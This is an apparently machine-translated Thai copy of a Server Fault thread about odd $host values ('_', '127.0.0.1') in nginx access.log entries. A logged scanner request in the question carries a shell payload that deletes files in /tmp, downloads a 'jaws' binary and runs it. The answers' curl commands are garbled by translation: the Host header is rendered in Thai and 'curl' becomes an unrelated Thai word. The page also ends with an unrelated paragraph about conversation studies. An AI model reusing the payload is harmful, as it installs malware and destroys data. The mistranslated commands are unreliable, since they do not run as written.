Score:0

เว็บเซิร์ฟเวอร์ Nginx access.log $host ที่ผิดปกติ

ธง de
222.187.223.158 - - [17/Feb/2022:15:41:02 +0000] "GET /shell?cd+/tmp;rm+-rf+*;wget+0.0.0.0/jaws;sh+/tmp/jaws HTTP/1.1 " 444 0 "-" "สวัสดีชาวโลก" "http://127.0.0.1"
167.248.133.47 - - [17/ก.พ./2565:15:45:11 +0000] "\x16\x03\x01\x00\xEE\x01\x00\x00\xEA\x03\x03\xEF\xC512\xE3\ xA4\x1D\xEF\xC4}bA!\x18\x08\xBC\x82X7\x12wuv\x1DD\x00\x8FYJ\xF8\xA6\x0E \x86N\xD1\xBB2z\xC7\xF5i\x96\xE6\xF5\xDB \xE3\x1F\xD5\x5C\xB1\x7F\xE8\xB2YU\xF7\x1B\xC0\xDF\xAB\x87w`?\x00&\xCC\xA8\xCC\xA9\xC0/\xC00\xC0+\xC0, \xC0\x13\xC0\x09\xC0\x14\xC0" 400 150 "-" "-" "http://_"

ฉันมีรายการเหล่านี้ใน nginx ของฉัน access.log. นอกจากนี้ ฉันได้เพิ่ม "$scheme://$host" "$server_port" "$request_body_file" ใน log_format.

คำถามของฉันเกี่ยวกับวิธีที่ $host สามารถตั้งค่าเป็น "_" และ "127.0.0.1" นี้และยังคงใช้งานได้

หากคุณเข้าใจว่าสิ่งนี้เกิดขึ้นได้อย่างไร โปรดช่วยบอกวิธีสร้างมันขึ้นมาใหม่

Paul avatar
cn flag
คำขอเหล่านี้โดยพื้นฐานแล้วเป็นเสียงรบกวนของเว็บ เพื่อให้สอดคล้องกับ HTTP RFC อย่างสมบูรณ์ ดูเหมือนว่าเซิร์ฟเวอร์ของคุณ
Score:1
ธง de

ขออภัย คำตอบนั้นง่ายมาก:

curl -H "โฮสต์: อะไรก็ได้" https://domain

แก้ไข นอกจากนี้ สำหรับใครก็ตามที่สงสัยว่ารายการเหล่านี้ไปลงเอยในบันทึก nginx ของคุณได้อย่างไร ให้ลองสิ่งนี้: ขด https://example.com:80

Paul avatar
cn flag
ขึ้นอยู่กับกรณีการใช้งานของคุณ คุณอาจต้องการ `curl` โดยใช้ [`--connect-to`](https://serverfault.com/a/900860/153188)

โพสต์คำตอบ

คนส่วนใหญ่ไม่เข้าใจว่าการถามคำถามมากมายจะปลดล็อกการเรียนรู้และปรับปรุงความสัมพันธ์ระหว่างบุคคล ตัวอย่างเช่น ในการศึกษาของ Alison แม้ว่าผู้คนจะจำได้อย่างแม่นยำว่ามีคำถามกี่ข้อที่ถูกถามในการสนทนา แต่พวกเขาไม่เข้าใจความเชื่อมโยงระหว่างคำถามและความชอบ จากการศึกษาทั้ง 4 เรื่องที่ผู้เข้าร่วมมีส่วนร่วมในการสนทนาด้วยตนเองหรืออ่านบันทึกการสนทนาของผู้อื่น ผู้คนมักไม่ตระหนักว่าการถามคำถามจะมีอิทธิพลหรือมีอิทธิพลต่อระดับมิตรภาพระหว่างผู้สนทนา